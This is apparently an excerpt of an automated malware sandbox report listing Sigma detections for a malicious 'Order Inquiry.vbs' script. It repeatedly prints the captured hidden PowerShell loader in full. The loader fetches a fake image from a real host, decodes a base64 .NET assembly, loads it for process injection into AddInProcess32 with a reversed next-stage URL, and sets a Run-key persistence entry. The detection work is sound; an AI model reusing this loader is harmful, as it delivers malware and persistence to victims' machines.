reJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base
          Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Sigma detected: Script Initiated Connection to Non-Local Network
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7592, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", ProcessId: 7592, ProcessName: wscript.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: \\tsclient\C\Program Files\aburrar.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
          Sigma detected: Script Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7592, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
          Sigma detected: Suspicious Copy From or To System Directory
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs", ProcessId: 8056, ProcessName: cmd.exe
          Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs", ProcessId: 7592, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgT